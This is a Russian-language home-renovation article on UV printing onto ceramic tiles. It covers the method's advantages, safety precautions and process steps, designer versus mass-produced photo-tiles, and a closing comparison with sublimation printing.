Ультрафиолетовый принтер для керамической плитки наносит изображение струйным методом, в ходе которого на поверхность кафеля распыляются специальные наночернила. Они позволяют создавать отпечатки высокого разрешения за счет умешенного размера капель, подаваемых из сопла устройства.

Печать на UV-принтерах обладает следующими преимуществами:

  • высокая устойчивость к влиянию таких негативных окружающих факторов как жир, вода, химические вещества и механические воздействия;
  • практичность в использовании (краски не требуют разбавления, быстро застывают под ультрафиолетовыми лучами);
  • экологичность;
  • высокое качество и детализация печати;
  • насыщенность и реалистичность цветовой палитры;
  • яркость получаемой картинки за счет нанесения красок сверху глазури;
  • возможность широкоформатной печати, которая позволяет создавать фотопанно на керамической плитке.

В качестве недостатков стоит отметить высокое потребление энергии UV-принтера.

Безопасное использование устройства предполагает соблюдение некоторых предосторожностей:

  • защита кожи при прямом контакте с чернилами;
  • установка специальных фильтров, снижающих выделение озона.

Уф-печать

  1. Заготовка помещается в станок и с помощью УФ-чернил наносится рисунок. Чернила мгновенно затвердевают под воздействием УФ-ламп. Существуют ограничения по размерам заготовок.
  2. Для получения более яркого и насыщенного цвета принтер может увеличить количество проходов на 50%, а также в качестве подслоя использовать белые чернила, но это удорожает стоимость.
  3. Для защиты тонкой краски и придания блеска иногда её покрывают лаком, но даже с ним она прослужит всего 6—12 месяцев.

На видео показан пример печати обычными чернилами на струйном принтере с покрытием лаком:

Уф-чернила для самых ярких рисунков

Ультрафиолетовая печать положительно отличается от некоторых традиционных видов нанесения, например, от надглазурной росписи, выполняемой минеральными красителями.

Для переноса изображения на кафель уф-лучами используют современное оборудование, а необходимость в печном обжиге отпадает. Преимущества уф-печати – в сохранении насыщенности рисунка, сочности оттенков, ярко выраженной контрастности.

Художественные достоинства дополнены  функциональными: плитка длительное время «держит» рисунок, не теряя при этом прочности и износостойкости. Слой, созданный уф-чернилами, не стирается при уходе мягкими средствами (но воздействие абразивными чистящими порошками исключено).

Нет необходимости пропечатывать каждую плитку в отдельности, изображение наносится на большой фрагмент, максимальный размер которого 125 см х 250 см.

Яркость и четкость, а также высокая разрешающая способность, сохраненные при переносе, позволяют печатать даже макрографические снимки, кадры подводной фотосъемки или животных в движении.

Идеально получаются картины общего плана, которые наносят на всю стену целиком – например, звездное небо, горная долина, степной пейзаж, подводный мир и др.

Учитывая абсолютную безопасность уф-чернил, обработанную ими керамику можно применять в ванных комнатах для детей.

Кадры из детских мультфильмов или рисунки из книг выглядят ярко, сочно, выразительно – как раз так, как нравится младшим членам семьи, да и мыться с любимыми сказочным героями намного интереснее, чем в скучной «взрослой» ванной.

Фотокерамика для ванной – промышленная и авторская

Все виды керамической плитки условно можно разделить на две большие категории:

  • авторская (работы известных дизайнеров или уникальные заказы, выполненные в студиях);
  • промышленная, поставленная «на поток» в больших количествах, рассчитанная на потребителя среднего ценового сегмента.

Деление на две группы актуально и для производства фотокерамики – плитки, на которую разными способами наносятся художественные, графические, стилизованные изображения.

Авторская фотоплитка рассчитана на покупателя с большими возможностями. С ее помощью облицовывают элитные интерьеры, где каждый элемент, каждый аксессуар претендует на уникальность и изысканность.

Примером авторских работ служат коллекции польского дизайнера Мачей Зеня.

Базовые матовые элементы чередуются с узкими бордюрами и глянцевыми вставками необычной формы, создавая футуристические картины, а главную декоративную составляющую представляют оригинальные панно, состоящие из 6-8 элементов.

Промышленную фото керамику можно встретить в большинстве строительных супермаркетов.

Большие, во всю стену панно обычно реализуют отдельно, а небольшие фрагменты, как правило, являются коллекционными и идеально смотрятся лишь в окружении «родной» серии.

Ручная работа – наиболее дорогостоящая. По вашему эскизу на заказ на керамическую основу нанесут любое изображение, от личных портретов до пейзажных композиций. При этом могут использовать плитку пиано или фрисайз пиано, рельефные элементы, широкие и карандашные бордюры.

Ювелирного мастерства требует создание имитации рисунка под древесину, кожу, холст или ковку.

Заключение

Если для вас не важен рельеф, выгодней обойдётся сублимационная печать на кафеле. По характеристикам она не уступает печати с обжигом, но стоит дешевле. Стоимость 1 элемента изготовленного по этой технологии можно сравнить с покупкой готового декора.

  1. Керамическая плитка с 3D изображением: технология нанесения рисунка - интересные советы по ремонту и дизайнуПанно из плитки для ванной комнаты, кухни, камина или фасада
  2. Керамическая плитка с 3D изображением: технология нанесения рисунка - интересные советы по ремонту и дизайнуПлиточный клей ЮНИС: выбор, технические характеристики, расход, инструкция
  3. Керамическая плитка с 3D изображением: технология нанесения рисунка - интересные советы по ремонту и дизайнуЗатирка Mapei на цементной и эпоксидной основе: описание, технические характеристики, расчет и применение